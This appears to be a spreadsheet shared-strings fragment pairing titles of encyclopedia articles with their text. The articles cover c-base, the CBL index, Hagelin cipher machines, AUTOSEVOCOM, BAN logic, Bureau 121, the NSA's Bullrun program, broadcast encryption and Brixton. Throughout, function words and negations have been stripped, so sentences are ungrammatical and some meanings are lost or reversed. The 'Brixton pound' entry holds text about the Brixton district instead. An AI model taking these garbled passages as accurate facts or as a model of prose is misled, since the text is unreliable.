there. second ring, com, harbours space ports, hangars communication devices including interstellar communication module recently identified blinkenlights chaos computer club. following three rings, culture, creactiv cience, host devices serving culture, creativity science. latter ring also location arboretum. accommodation station crew members found carbon ring. outer ring, clamp, stabilizes station. trivia september 2006, pirate party germany established c-base. episode 430, "tödliches labyrinth" episode "tod einer heuschrecke" german television series tatort filmed c-base. wikipedia local chapter c-base regularly since 2004. literature c-booc: years history publication c-base c-base c-base. official handout v.6.0s, berlin 2004 german) external links c-base-homepage german) c-base space station berlin german) c-base myspace.com showing videos music members german) references</t>
  </si>
  <si>
    <t>CBL Index</t>
  </si>
  <si>
    <t>index ratio number addresses given subnet (subnetwork) number (composite blocking list) listings subnet. used measure "clean" compromised computers) given subnet is.the higher number "cleaner" subnet. index represented decibels (db) cidr suffix (*/xx). note: spam researchers prefer percentage listed subnet. using percentages better suited "unclean" subnets "clean" nets significantly less addresses listed. rationale dnsbl (composite blocking list) lists addresses compromised virus spam sending infection (computer worm, computer virus, spamware). cbl's full zone (data) available publicly rsync download.the index reasonably good tool getting estimates subnet "outgoing spam reputation". treated caution subnets often contain radically different purposes. assuming within subnet represent risk/reputation potentially dangerous. index used estimation overall anti-spam performance operator. example zone dated 2007-07-07t21:03+00:00 166_086 addresses listed 83.0.0.0/11 network. index was: 2_097_152/166_086 12.6 (*/28.3 11.0 2_097_152 number addresses */11 network (2**(32-11)) literature giovane césar moura (2013). internet neighborhoods. enschede: ipskamp drukkers. doi:10.3990/1.9789036534604. isbn 978-9036534604. external links "the cbl". references</t>
  </si>
  <si>
    <t>Automated whitelist</t>
  </si>
  <si>
    <t>automated whitelist whitelist created and/or maintained system analyzes bi-directional email. anti-spam systems automated whitelist whitelist created maintained system monitors incoming and/or outgoing email, based preset criteria, remove entries whitelist without need human intervention. optionally, automated whitelisting systems review records past email communications previously stored within email server's email client's) archives inclusion whitelist. this functionality enhancement creating whitelist manually, exporting customer, vendor, friends, contact lists various sources, tediously assemble whitelist. additionally, system removes difficult task maintaining whitelist email relationships formed. works oscar boykin vwani roychowdhury department electrical engineering, university california point out, exploit properties social networks construct automated anti-spam tool processes individual user's personal email network simultaneously identify user's core trusted networks friends, well subnetworks generated spams"; extensive research discovers "surprisingly effective technique" superior levels "accuracy automation"; explain, requires user intervention supervised training; second, results false negatives i.e., spam misclassified non-spam, vice versa." criticisms some anti-spam systems method known oversimplify whitelist adding domain name portion email addresses, thereby allowing undesirable mail spammers slip through. other systems known inappropriately spammers clients using autoresponders, "i'm office today" message, spammers using read receipt. most systems known require outgoing email funneled system analysis automated inclusion; whereas, others offer small plugin existing email server, thereby altering existing outbound delivery path. also whitelist references most sources describing functionality automated whitelist specifically tied particular anti-spam product's implementation; therefore, interest maintaining neutrality, common sources referenced herein.</t>
  </si>
  <si>
    <t>C-52 (cipher machine)</t>
  </si>
  <si>
    <t>(hagelin) c-52 cx-52 cipher machines manufactured crypto starting 1951/1952. these pin-and-lug type cipher machines advanced successors c-38/m-209. machine measures 8+1⁄2 5+3⁄8 4+3⁄8 inches cm). device mechanical, combined electric keyboard attachment, b-52, resultant system termed bc-52. b-52 larger, measuring 12+1⁄2 8+1⁄2 6+3⁄8 inches cm). hell licensed copy c-52 german company hell. structure operation both models equipped pinwheels. c-52 version, wheels chosen possible number pins wheel model fixed stepping system large wheel cycle mutually prime factors counts. cx-52 version pinwheels pins flexible wheel movement system. cage models contains movable bars: bars used encryption remaining bars control stepping pinwheels. early models used control bars also encryption complications creating acceptable settings later models used bars controlling wheel stepping. stepping wheels controlled adjustable lugs control bars. c-52 cx-52 flexible machines could produced various ways, creating unique machine unique cryptographic characteristics customer. there special detachable wheel movement bars position drum could change, interchangeable print wheels, custom pinwheel labels, versions one-time tape reader instead wheels, versions enciphered numbers, many details influenced enciphering process. breaking compromising there speculation cx-52 might broken communist signals intelligence services east germany, czechoslovakia poland.many c-52 cx-52 machines sold crypto compromised benefit british national signals intelligence agencies, national security agency (nsa) government communications headquarters (gchq), respectively. details, crypto compromised machines. also operation rubicon (crypto m-209 c-36 (cipher machine) cd-57 notes references external links paul greenough, cryptanalysis hagelin c-52 similar machines known plaintext attack, cryptologia, 23(2), july 1999, pp139–156. louis kruh, hagelin cryptographer, type c-52, cryptologia 3(2), april 1979, pp78–82. bury, from archives: cx-52 messages read poles?, cryptologia 33(4), october 2009, pp347–352. bury, polish cold codebreaking 1959–1989: preliminary assessment, cryptologia 36(4), october 2012, pp341–379. technical details c-52 cx-52 encryption principle machine variations, dirk rijmenants dirk rijmenants' hagelin bc-52 simulator hagelin cryptographer cx-52 torbjorn andersson write-up, photograph qbasic simulator. jerry proc's page cx-52 also covers b-52 keyboard unit. photographs: [1], [2], [3], [4], [5], jerry proc's page hell licensed copy c-52 hell descriptions sales c-52 cx-52 equipment cx-52 cryptographic machine b-52 motorized base cx-52-related stasi files</t>
  </si>
  <si>
    <t>C-36 (cipher machine)</t>
  </si>
  <si>
    <t>c-35 c-36 cipher machines designed swedish cryptographer boris hagelin 1930s. these first hagelin's cipher machines feature pin-and-lug mechanism. later machine series, c-38, designated csp-1500 united states navy m-209 united states military, used extensively. 1934, french military approached hagelin design printing, pocket-size cipher machine; hagelin carved piece wood outline dimensions machine would pocket. adapted previous inventions three years earlier: adding device designed vending machines, combined pinwheel mechanism earlier cipher machine (the b-21). french ordered 5,000 1935. italy declined machine, although would later m-209 c-38. completely mechanical, c-35 machine measured inches, weighed less pounds. revised machine, c-36, similar c-35, different distribution lugs bars. c-36 machines purchased swedish navy testing october 1937. both machines five pinwheels pins, individually settable, giving maximum period 3,900,225 machine. c-362 revision included improvements, notably movable lugs instead fixed.one variant thai alphabet pinwheels, rather usual latin alphabet. references torbjörn andersson, hagelin c-35/c-36, [2], retrieved november 2005. boris hagelin, story hagelin cryptos, cryptologia, 18(3), july 1994, 204–242. david kahn, codebreakers, 1967, 1996, chapter pp426–427. unknown, information card c-36 machine enigma friends exhibit bletchley park museum, 2005. further reading deavours, solution c-35 texts partial key, cryptologia, 14(2), april 1990 pp162–168.</t>
  </si>
  <si>
    <t>Automatic Secure Voice Communications Network</t>
  </si>
  <si>
    <t>automatic secure voice communications network (autosevocom) worldwide, switched, secure voice network united states armed forces, operational late 1960s 1980s. closely related automatic voice network autovon, main non-secure switched telephone network military. phase during mid-1960s, united states government decided implement worldwide secure voice network. this named automatic secure voice communications network, acronym autosevocom, national security agency's first program united states department defense's telephone protection. cumbersome expensive system available high-level users. because inadequacies, defense department capped 1850 terminals, late 1960s, hoping something better, decided continue expansion autosevocom.phase network approved deputy secretary defense july 1967 took several years implement autosevocom within continental united states. autosevocom-i non-tactical network enabled users discuss classified sensitive information telephone. network consisted switching centres, transmission facilities subscriber terminals. subscribers homed either autosevocom switch, automatic voice network (autovon) switch, joint overseas switchboard (joss), example operated maintained numerous signal battalions vietnam. autosevocom switches provided wideband secure voice communications local subscribers enabled establish long-distance secure voice calls. majority long-distance calls routed autovon. phase difficulties speech intelligibility, requirements voice recognition, holding telephone conferences, speedier service, simpler calling procedures defense officials approve development improved system, called autosevocom army designated agency primary responsibility developing system. 1976, deputy secretary defense approved full-scale development autosevocom programme. autosevocom incorporated technological advances furnished higher quality communications several thousand subscribers expected operation years 1980 1985. u.s. army communications command acted program manager autosevocom automatic secure voice communications network succeeded defense switch network (drsn) stu-iii secure phones. last autosevocom secure voice switch world deactivated pentagon 1994. external links crypto machines: autosevocom janes defense: automatic secure voice communications (autosevocom) references</t>
  </si>
  <si>
    <t>Börse Stuttgart</t>
  </si>
  <si>
    <t>börse stuttgart (swb) stock exchange germany, second largest country ninth largest europe. structure börse stuttgart group börse stuttgart holding gmbh baden-wuerttembergische wertpapierboerse gmbh baden-wuerttembergische wertpapierboerse e.v. history börse stuttgart came existence february 1860, group people different industries decided meet regularly. first meeting occurred march 1860. after changing location several times, exchange located carl eugen bau.in 2005, börse stuttgart, cooperation zertifikatejournal-unternehmensgruppe, launched s-box, collection differently themed indices.since late 2007, börse stuttgart holds 82.4 percent stake euwax november 2008, börse stuttgart holding gmbh acquired nordic growth market second largest stock exchange sweden. t.i.q.s. gmbh joint venture börse stuttgart euwax developed t.i.q.s. (trading, information quote system), trading platform. 2010, bourse started bondm, trading segment bonds. boerse stuttgart digital exchange (bsdex) boerse stuttgart digital exchange (bsdex) germany's first regulated trading venue cryptocurrencies. launched december 2019 four cryptocurrencies bitcoin, ethereum, litecoin ripple traded there. multilateral trading system bsdex meets regulatory requirements according section (12) kwg. euwax commissioned increase liquidity, also regulated financial service provider. partner financial service provider solarisbank. bison january 2019, boerse stuttgart released smartphone bison (own spelling: bison), first crypto trading backed traditional stock exchange. developed sowa labs. users sell cryptocurrencies bitcoin (btc), bitcoin cash (bch), chainlink (link), ethereum (eth), litecoin (ltc), ripple (xrp) uniswap (uni) euwax, acts broker. cryptocurrencies kept blocknox gmbh. euwax, sowa labs blocknox subsidiaries boerse stuttgart. spring 2021, around 400,000 users registered bison, triggered trading volume billion euros point. references further reading löhndorf, (2010). zertifikate reoladed- produkt marke: transparenz, vertrauen, rendite eine anlageklasse positioniert sich german) (1st ed.). wiesbaden: gabler fachverlage gmbh. 247–266. isbn 978-3-8349-1652-5. external links homepage börse stuttgart</t>
  </si>
  <si>
    <t>Automatic repeat request</t>
  </si>
  <si>
    <t>automatic repeat request (arq), also known automatic repeat query, error-control method data transmission uses acknowledgements (messages sent receiver indicating correctly received packet) timeouts (specified periods time allowed elapse acknowledgment received) achieve reliable data transmission unreliable communication channel. sender receive acknowledgment timeout, re-transmits packet receives acknowledgment exceeds predefined number retransmissions. variations protocols include stop-and-wait arq, go-back-n arq, selective repeat arq. three protocols usually form sliding window protocol help sender determine any) packets need retransmitted. these protocols reside data link transport layers (layers model. examples transmission control protocol uses variant go-back-n ensure reliable transmission data internet protocol, provide guaranteed delivery packets; selective acknowledgement (sack), uses selective repeat arq. ieee 802.11 wireless networking uses retransmissions data-link layer.itu-t g.hn uses hybrid arq, mixture high-rate forward error correction (fec) arq. high-speed local area network standard operate data rates gbit/s existing home wiring (power lines, phone lines coaxial cables). g.hn uses crc-32c error detection, ldpc selective repeat arq. systems widely used shortwave radio ensure reliable delivery data telegrams. these systems came forms called arq-e arq-m, also included ability multiplex four channels. number patents exist live video contribution environments. high throughput environments negative acknowledgements used drive overheads. also hybrid automatic repeat request references peterson davie, computer networks: systems approach, third edition, 2003 3366 advice link designers link automatic repeat request (arq) negative acknowledgement live video this article incorporates public domain material general services administration document: "federal standard 1037c". support mil-std-188)</t>
  </si>
  <si>
    <t>Buypass</t>
  </si>
  <si>
    <t>buypass etsi-certified certificate authority (ca) issuing certificates, enterprise certificates person based pki-standard. company founded norway 2001. buypass registered norwegian communication authority issuer qualified certificates norwegian electronic signature act. buypass also registered provider electronic identification related identification services certificate authorities requirements specifications public sector. this prerequisite supplying identifications solutions services public sector. buypass major providers norway category. march 2018, buypass became first commercial offer free acme certificates branding buypass solutions ssl/tls-certificates european certificate authority (ca) issuing ssl-certificates world wide. including ssl-certificates extended validation (ev). buypass member ca/browser forum offers free server certificates acme protocol. personal electronic (buypass including smart cards mobile. provides access government services, web-services vpns. patented operator independent mobile authentication payment option. enterprise certificates multi factor authentication payment options mobile. references</t>
  </si>
  <si>
    <t>Bust of Edward Snowden</t>
  </si>
  <si>
    <t>bust edward snowden, called prison ship martyrs' monument creators, ephemeral, illegally installed public sculpture edward snowden, american whistleblower leaked classified information national security agency (nsa) charged federal crimes result. bronze-like bust placed fort greene park fort greene, brooklyn, york city, april 2015. attached doric column perimeter park's prison ship martyrs' monument, memorial crypt honors inters 11,500 american prisoners died american revolution housed british prison ships.affixed atop existing column, bust mounted three anonymous artists helpers, dressed white construction helmets reflective vests imitation parks department workers, early morning april covered taken parks officials later day. hologram tribute snowden subsequently installed sculpture removed. development design piece conceived 2014 artists york city sculptor west coast. sculptor volunteered time skill creating bust, piece eventually costing thousands dollars create months. artwork consisted 4-foot (1.2 high, 100-pound bust snowden doric column, plexiglas stand snowden's name it.the piece fused fort greene park's prison ship martyrs' monument commemorates american prisoners died aboard british prison ships, pre-dawn hours april 2015. sculptor recommended artists create bust suggested life-size statue snowden. bust made hydrocal, plaster-like substance resembling bronze appearance, fixed pre-existing column non-damaging adhesive. piece designed similar style sculptures park.while important artists piece prop papier-mache effigy, also wished damage surface bust would bound. after debate, decided adhesive would firmly hold head place, could removed without marring monument. sculpture snowden's name base, consistent names bases sculptures park.the guardian newspaper expressed view bust also looked like former white house press secretary carney people thought looked like snowden.prison ship martyrs' monument least sculptures monuments snowden appeared around world. october 2014, statue snowden appeared union square, manhattan, near henry kirke brown's statue abraham lincoln. shown conjunction places festival sculpted dessicino, delaware artist. bust's observers compared snowden daniel ellsberg, leaked pentagon papers york times. installation creators sculpture, dubbed "guerrilla artists" media, released statement animal york website detailing motivations documenting bust's installation exchange anonymity. statement, artists said: updated monument highlight sacrifice safety fight modern-day tyrannies. would dishonor memorialized laud protect ideals fought for, edward snowden bringing nsa's 4th-amendment-violating surveillance programs light. often, figures strive uphold ideals cast criminals rather bronze goal bring renewed vitality space prompt even visitors ponder sacrifices made freedoms. hope inspires reflect upon responsibility bear ensure liberties exist long future. artists also expressed dismay perceived public apathy snowden's revelations.while anticipating sculpture's probable demise, creators told mashable april 2015 "hope york embrace protect piece, much wall street bull granted permanent public home guerrilla placement. even though already [sic] towards removed, possibility exists city make piece available public viewing sanctioned way."the unsanctioned bust appeared hours hbo's broadcast john oliver's last week tonight interview snowden moscow. removal aftermath local residents varied responses. sculpture hours covered blue tarpaulin bound rope 12:30 april 2015, almost immediately official discovered taken hour later. calling "art prank", investigators york city police department's intelligence division reportedly gathered examining evidence attempt determine identity artist artists. according spokesperson york city department parks recreation, "[t]he erection unapproved structure artwork city park illegal." some passersby annoyed covering bust, however.the bust held nypd's 88th precinct pending investigation's outcome.hours sculpture removed, group york artists calling illuminator collective—unrelated three artists created bust—used smoke projection equipment create ephemeral "hologram" image snowden place missing sculpture. this projection included snowden's face pillars, well "snowden" white letters bottom pillar. collective artists said, "our feeling state remove material artifacts speak defiance incumbent authoritarianism, acts resistance remain public consciousness. sharing defiance hope resides." original artists said "touched" bust nameplate "reinstalled" light, adding "surprised statue covered removal, though profane statement."new york city number pieces street art, like charging bull, become cultural icons tourist attractions. online petition sought return bust prison ship martyrs' monument.the york daily news reported april 2015, kuby, lawyer representing unidentified artists, asked york city police commissioner bill bratton return sculpture creators. kuby stated, "the statue contraband. whatever right parks department remove unauthorized sculpture, translate right police indefinitely detain work art." artists planned submit application authorized public display, manhattan gallery also expressed interest exhibiting snowden sculpture. return sculpture after negotiations artists' attorney, city returned sculpture 2015, assessing artist fine non-criminal trespassing illegally entered fort greene park night. kuby promised clients' fines would "promptly paid", expressed gratitude potential removal storage fees sculpture waived. police summons identified artists andrew tider jeff greenspan.the undamaged bust first post-police custody exhibition 8–17 boiler brooklyn, show titled anonymity, longer option. artists reportedly applying sculpture legally exhibited york city city's "art parks" program: "this time they're dotting crossing t's", kuby said.it thereafter exhibited brooklyn museum. notes references external links "there's massive, illicit bust edward snowden stuck monument brooklyn" video animal york youtube guttman, boaz (april 2015). "giant edward snowden sculpture appears monument brooklyn park 6/4/15". flickr. model statue column sketchfab model snowden bust sketchfab interview jeff greenspan edward snowden statue webydo</t>
  </si>
  <si>
    <t>Burrows–Abadi–Needham logic</t>
  </si>
  <si>
    <t>burrows–abadi–needham logic (also known logic) rules defining analyzing information exchange protocols. specifically, logic helps users determine whether exchanged information trustworthy, secured eavesdropping, both. logic starts assumption information exchanges happen media vulnerable tampering public monitoring. this evolved popular security mantra, "don't trust network." typical logic sequence includes three steps: verification message origin verification message freshness verification origin's trustworthiness.ban logic uses postulates definitions like axiomatic systems analyze authentication protocols. logic often accompanies security protocol notation formulation protocol sometimes given papers. language type logic, logics family, decidable: exists algorithm taking hypotheses purported conclusion, answers whether conclusion derivable hypotheses. proposed algorithms variant magic sets. alternatives criticism logic inspired many similar formalisms, logic. some repair weakness logic: lack good semantics clear meaning terms knowledge possible universes. however, starting mid-1990s, crypto protocols analyzed operational models (assuming perfect cryptography) using model checkers, numerous bugs found protocols "verified" logic related formalisms. cases protocol reasoned secure analysis fact insecure. this abandonment ban-family logics favor proof methods based standard invariance reasoning. basic rules definitions implications network agents, message, encryption key): believes acts true, assert messages. jurisdiction beliefs trusted. said time, transmitted (and believed) message although might longer believe sees receives message read repeat {x}k: encrypted fresh(x): previously sent message. key(k, p↔q): communicate shared kthe meaning definitions captured series postulates: believes key(k, p↔q), sees {x}k, believes said believes said believes fresh(x), believes believes x).p must believe fresh here. known fresh, might obsolete message, replayed attacker. believes jurisdiction believes believes believes there several technical postulates composition messages. example, believes said concatenation also believes said also believes said y.using notation, assumptions behind authentication protocol formalized. using postulates, prove certain agents believe communicate using certain keys. proof fails, point failure usually suggests attack compromises protocol. logic analysis wide mouth frog protocol simple protocol wide mouth frog protocol allows agents, establish secure communications, using trusted authentication server, synchronized clocks around. using standard notation protocol specified follows: {\displaystyle a\rightarrow s:a,\{t_{a},k_{ab},b\}_{k_{as}}} {\displaystyle s\rightarrow b:\{t_{s},k_{ab},a\}_{k_{bs}}} agents equipped keys kbs, respectively, communicating securely assumptions: believes key(kas, a↔s) believes key(kas, a↔s) believes key(kbs, b↔s) believes key(kbs, b↔s)agent wants initiate secure conversation therefore invents key, kab, communicate believes secure, since made itself: believes key(kab, a↔b)b willing accept key, long sure came believes jurisdiction key(k, a↔b))moreover, willing trust accurately relay keys believes jurisdiction believes key(k, a↔b)))that believes believes wants particular communicate trust believe also. goal believes key(kab, a↔b)a reads clock, obtaining current time sends following message: a→s: key(kab, a↔b)}kasthat sends chosen session current time encrypted private authentication server kas. since believes key(kas, a↔s), sees key(kab, a↔b)}kas, concludes actually said key(kab, a↔b)}. particular, believes message manufactured whole cloth attacker.) since clocks synchronized, assume believes fresh(t)since believes fresh(t) believes said key(kab, a↔b)}, believes actually believes key(kab, a↔b). particular, believes message replayed attacker captured time past.) forwards s→b: believes key(kab, a↔b)}kbsbecause message encrypted kbs, believes key(kbs, b↔s), believes said believes key(kab, a↔b)}. because clocks synchronized, believes fresh(t), fresh(a believes key(kab, a↔b)). because believes statement fresh, believes believes believes key(kab, a↔b)). because believes authoritative believes, believes believes key(kab, a↔b)). because believes authoritative session keys believes key(kab, a↔b). contact directly, using secret session key. let's suppose abandon assumption clocks synchronized. case, gets message key(kab, a↔b)}, longer conclude fresh. knows sent message time past (because encrypted kas) recent message, believe necessarily wants continue kab. this points directly attack protocol: attacker capture messages guess session keys kab. (this might take long time.) attacker replays key(kab, a↔b)} message, sending clocks synchronized (perhaps part attack), might believe message request old, compromised again. original logic authentication paper (linked below) contains example many others, including analyses kerberos handshake protocol, versions andrew project handshake (one defective). references further reading burrows, michael; abadi, martín; needham, roger (1989). logic authentication". proceedings royal society london, series (1871): 233. bibcode:1989rspsa.426..233b. citeseerx 10.1.1.115.3569. doi:10.1098/rspa.1989.0125. s2cid 6937380. source: burrows–abadi–needham logic</t>
  </si>
  <si>
    <t>Bureau 121</t>
  </si>
  <si>
    <t>bureau north korean cyberwarfare agency, main unit reconnaissance general bureau north korea's military. conducts offensive cyber operations, including espionage cyber-enabled finance crime. according american authorities, manages clandestine operations bureaus.cyber operations thought cost-effective north korea maintain asymmetric military option, well means gather intelligence; primary intelligence targets south korea, japan, united states. history bureau created 1998. targets methods activities agency came public attention december 2014 sony pictures canceled opening movie interview computers hacked. bureau blamed cyber breach, north korea rejected accusation.much agency's activity directed south korea. prior attack sony, north korea said attacked 30,000 south korea affecting banks broadcasting companies well website south korean president park geun-hye north korea also thought responsible infecting thousands south korean smartphones 2013 malicious gaming application. attacks south korea allegedly conducted group called darkseoul gang estimated computer security company symantec members "unique" ability infiltrate websites.american authorities believe north korea military offensive cyber operations capability responsible malicious cyber activity since 2009. part sophisticated set-up, cells bureau believed operating around world. suspected locations bureau cell chilbosan hotel shenyang, china.south korea also repeatedly blamed bureau conducting jamming aimed south korea. recent case jamming occurred april 2016. structure bureau consists following units 2019: 110office office office unit unit liaison office liaison office staffing bureau largest (more hackers) sophisticated unit rgb. according report reuters, bureau staffed north korea's talented computer experts korean military. defector indicated agency 1,800 specialists. many bureau's hackers hand-picked graduates university automation, pyongyang spend five years training. 2021 estimate suggested 6,000 members bureau 121, many operating countries, belarus, china, india, malaysia, russia.while specialists scattered around world, families benefit special privileges home. alleged operations 2013 south korea cyberattack november 2014 sony pictures hack february 2016 bangladesh bank robbery 2015–2016 swift banking hack 2017 wannacry ransomware attack also tailored access operations, unit 61398, china lazarus group references</t>
  </si>
  <si>
    <t>Bullrun (decryption program)</t>
  </si>
  <si>
    <t>bullrun (stylized bullrun) clandestine, highly classified program crack encryption online communications data, united states national security agency (nsa). british government communications headquarters (gchq) similar program codenamed edgehill. according bullrun classification guide published guardian, program uses multiple methods including computer network exploitation, interdiction, industry relationships, collaboration intelligence community entities, advanced mathematical techniques. information program's existence leaked 2013 edward snowden. although snowden's documents contain technical information exact cryptanalytic capabilities snowden clearance access information, contain 2010 gchq presentation claims "vast amounts encrypted internet data till discarded exploitable". number technical details regarding program found snowden's documents additionally censored press behest intelligence officials. programs leaked snowden, bullrun decryption program expensive. snowden claims since 2011, expenses devoted bullrun amount $800 million. leaked documents reveal bullrun seeks "defeat encryption used specific network communication technologies". naming access according nsa's bullrun classification guide, bullrun sensitive compartmented information (sci) control system compartment, codeword shown classification line, classification dissemination markings. furthermore, details specific cryptographic successes recommend additionally restricted (besides marked secret//si) exceptionally controlled information labels; non-exclusive list possible bullrun labels given aperiodic, ambulant, auntie, paintedeagle, pawleys, pitchford, pendleton, picaresque, piedmont without details labels mean.access program limited group personnel five eyes (fvey), signals intelligence agencies united kingdom (gchq), canada (cse), australia (asd), zealand (gcsb). signals cannot decrypted current technology retained indefinitely agencies continue attempt decrypt them. methods through nsa-designed clipper chip, used skipjack cipher intentional backdoor, using various specifically designed laws calea, cesa restrictions export encryption software evidenced bernstein united states, u.s. government publicly attempted 1990s ensure access communications ability decrypt. particular, technical measures escrow, euphemism backdoor, criticism little success. encourages manufacturers security technology disclose backdoors products encryption keys access encrypted data. however, fearing widespread adoption encryption, stealthily influence weaken encryption standards obtain master keys—either agreement, force law, computer network exploitation (hacking).according bullrun briefing document, agency successfully infiltrated secure sockets layer well virtual private networks (vpns). york times reported that: "but 2006, n.s.a. document notes, agency broken communications three foreign airlines, travel reservation system, foreign government's nuclear department another's internet service cracking virtual private networks protected them. 2010, edgehill program, british counterencryption effort, unscrambling traffic targets goal additional 300."as part bullrun, also actively working "insert vulnerabilities commercial encryption systems, systems, networks, endpoint communications devices used targets". york times reported random number generator dual_ec_drbg contains back door, would allow break encryption keys generated random number generator. even though random number generator known insecure slow soon standard published, potential kleptographic backdoor found 2007 alternative random number generators without flaws certified widely available, security continued using dual_ec_drbg company's bsafe toolkit data protection manager september 2013. while security denied knowingly inserting backdoor bsafe, given explanation continued usage dual_ec_drbg flaws became apparent 2006 2007. reported december 2013 accepted payment million random number generator default. leaked documents state effort challenge finesse” “eventually, n.s.a. became sole editor” standard.by 2010, leaked documents state developed "groundbreaking capabilities" encrypted internet traffic. gchq document warned however "these capabilities among sigint community's fragile, inadvertent disclosure simple 'fact could alert adversary result immediate loss capability." another internal document stated "there 'need know.'" several experts, including bruce schneier christopher soghoian, speculated successful attack rc4, encryption algorithm used least percent ssl/tls traffic time, plausible avenue, given several publicly known weaknesses rc4. others speculated gained ability crack 1024-bit rsa/dh keys. since prohibited versions 7465 2015, attacks weakening breaking used ssl/tls. fallout wake bullrun revelations, open source projects, including freebsd openssl, seen increase reluctance (fully) trust hardware-based cryptographic primitives.many software projects, companies organizations responded increase evaluation security encryption processes. example, google doubled size certificates 1024 bits 2048 bits.revelations backdoors purposeful complication standards backlash participation standards bodies. prior revelations nsa's presence committees seen benefit given expertise encryption.there speculation aware heartbleed bug, caused major websites vulnerable password theft, reveal information order exploit themselves. etymology name "bullrun" taken first battle bull run, first major battle american civil war. predecessor "manassas", alternate name battle battle took place. "edgehill" battle edgehill, first battle english civil war. also https ipsec mass surveillance mass surveillance united kingdom mass surveillance united states muscular prism tailored access operations transport layer security voice references external links https://www.eff.org/deeplinks/2013/09/crucial-unanswered-questions-about-nsa-bullrun-program https://www.nytimes.com/interactive/2013/09/05/us/documents-reveal-nsa-campaign-against-encryption.html?_r=0 https://www.schneier.com/blog/archives/2013/10/defending_again_1.html cryptography opening discussion: speculation "bullrun" john gilmore https://www.cs.auckland.ac.nz/~pgut001/pubs/crypto_wont_help.pdf</t>
  </si>
  <si>
    <t>Bulgarian medieval cryptography</t>
  </si>
  <si>
    <t>bulgarian medieval cryptography hidden, encrypted writing certain texts middle ages. dates 11th century. bulgarian medieval writers usually write name place writing secret. initially, glagolitic script used cyrillic monuments secret letter. some common medieval bulgarian cryptographic systems known, byzantine origin. well-known interchange letters whose numeric value supplemented 1000. only cyrillic letters greek correspondences included system, letters titlo (5); titlo (50) titlo (500) replace other. this mysterious system also complicated variant, alphabetic character represented several letters, numerical values equal numerical value replaced letter. other mysterious systems interchange consonant letters, arranged lines; microscopic letter; mirror letter monogram. there specialized studies field bulgarian medieval cryptography view distribution time territorial scope. also relationship cyrillic glagolitic scripts ravna monastery references</t>
  </si>
  <si>
    <t>Broadcast encryption</t>
  </si>
  <si>
    <t>broadcast encryption cryptographic problem delivering encrypted content (e.g. programs data dvds) broadcast channel qualified users (e.g. subscribers paid fees players conforming specification) decrypt content. challenge arises requirement qualified users change broadcast emission, therefore revocation individual users user groups possible using broadcast transmissions, only, without affecting remaining users. efficient revocation primary objective broadcast encryption, solutions also referred revocation schemes.rather directly encrypting content qualified users, broadcast encryption schemes distribute keying information allows qualified users reconstruct content encryption whereas revoked users find insufficient information recover key. typical setting considered unidirectional broadcaster stateless users (i.e., users keep bookmarking previous messages broadcaster), especially challenging. contrast, scenario users supported bi-directional communication link broadcaster thus easily maintain state, users dynamically revoked also added (joined), often referred multicast encryption.the problem practical broadcast encryption first formally studied amos fiat moni naor 1994. since then, several solutions described literature, including combinatorial constructions, one-time revocation schemes based secret sharing techniques, tree-based constructions. general, offer various trade-offs increase size broadcast, number keys user needs store, feasibility unqualified user collusion unqualified users able decrypt content. luby staddon used combinatorial approach study trade-offs general classes broadcast encryption algorithms. particularly efficient tree-based construction "subset difference" scheme, derived class so-called subset cover schemes. subset difference scheme notably implemented aacs blu-ray disc encryption. rather simple broadcast encryption scheme used encryption. problem rogue users sharing decryption keys decrypted content unqualified users mathematically insoluble. traitor tracing algorithms minimize damage retroactively identifying user users leaked keys, punitive measures, legal otherwise, undertaken. practice, systems often employ set-top boxes tamper-resistant smart cards impose physical restraints user learning decryption keys. some broadcast encryption schemes, aacs, also provide tracing capabilities. also multicast encryption threshold cryptosystem digital rights management references</t>
  </si>
  <si>
    <t>Brixton pound</t>
  </si>
  <si>
    <t>brixton district south london, part london borough lambeth, england. area identified london plan major centres greater london. brixton experienced rapid rise population 19th century communications central london improved. brixton mainly residential, though includes brixton market substantial retail sector. multi-ethnic community, large percentage population afro-caribbean descent. lies within inner london bordered stockwell, clapham, streatham, camberwell, tulse hill, balham herne hill. district houses main offices lambeth london borough council.brixton (4.3 south-southeast geographical centre london near brixton underground station victoria line. history toponymy name brixton thought originate brixistane, meaning stone brixi, saxon lord. brixi thought erected boundary stone mark meeting place ancient brixton hundred court surrey. location unknown thought brixton hill, road known time bristow brixton causeway, long settlement area. until mid-19th century brixton marks rise marshes north ancient parish lambeth hills upper norwood streatham. time river effra flowed source upper norwood herne hill brixton. brixton river crossed bridges roman roads south coast, brixton road clapham road. main roads connected network medieval country lanes, acre lane, coldharbour lane, brixton water lane lyham road, formerly black lane. 18th century villages settlements formed around brixton, original woodland gradually reduced area covered farmland market gardens known game strawberries.the area remained undeveloped beginning 19th century, main settlements near stockwell, brixton hill coldharbour lane. with opening vauxhall bridge 1816, improved access central london process suburban development. largest single development, last suburban character, angell town, laid 1850s east side brixton road, named family owned land lambeth late 17th century well 20th. bridges built across thames early 19th century working city london west moved south london. first development washway, brixton road. with enclosing manor lambeth, owned archbishop canterbury, 1806 opening vauxhall bridge 1816, terraced houses detached villas started line main roads. rush common enclosure stipulations dictated houses back main roads, allowing generous gardens. matthew's church part former common land consecrated 1824. parish matthew brixton, five subdivisions ancient lambeth parish, stretched camberwell green northeast, clapham road northwest, outer edge brockwell park southeast kingswood road southwest. ashby's mill, surviving windmills london, built 1816, brixton hill surrounded houses built brixton's victorian expansion. surrey house correction, later brixton prison, established 1819.as part reform 1832 expanding area london given representation creation parliamentary boroughs covering metropolitan area. only part brixton north matthew's church became part lambeth parliamentary borough, reflecting still semi-rural nature southern part area. population brixton 10,175 1841, parish lambeth. twenty years population doubled. victorian expansion when london sewerage system constructed mid-19th century, designer joseph bazalgette incorporated flows river effra 'high-level interceptor sewer', also known effra sewer.brixton connected central london rail august 1862 brixton south stockwell railway station opened london, chatham dover railway line victoria. august 1866 london, brighton south coast railway opened loughborough park railway station connections london bridge following year victoria. with arrival railways building boom brixton transformed middle class suburb 1860s 1890s brixton developed major shopping centre. first purpose-built department store, marché, opened brixton road 1877 electric avenue first shopping arcades electric lighting. famous brixton market began atlantic road moved station road 1920s ease traffic congestion.in 1881 population brixton 62,837, home quarter parish lambeth.a prominent building brixton high street 472–488 brixton road) morleys, independent department store established 1880s. 1888, electric avenue named became first street london electricity. time, large expensive houses constructed along main roads brixton, converted flats boarding houses start 20th century middle classes replaced influx working classes. before world 1925, brixton attracted thousands people. housed largest shopping centre south london time, well thriving market, cinemas, pubs theatre. 1920s, brixton shopping capital south london three large department stores earliest branches britain's major national retailers. today, brixton road main shopping area, fusing brixton market. western boundary brixton clapham stands sunlight laundry, deco 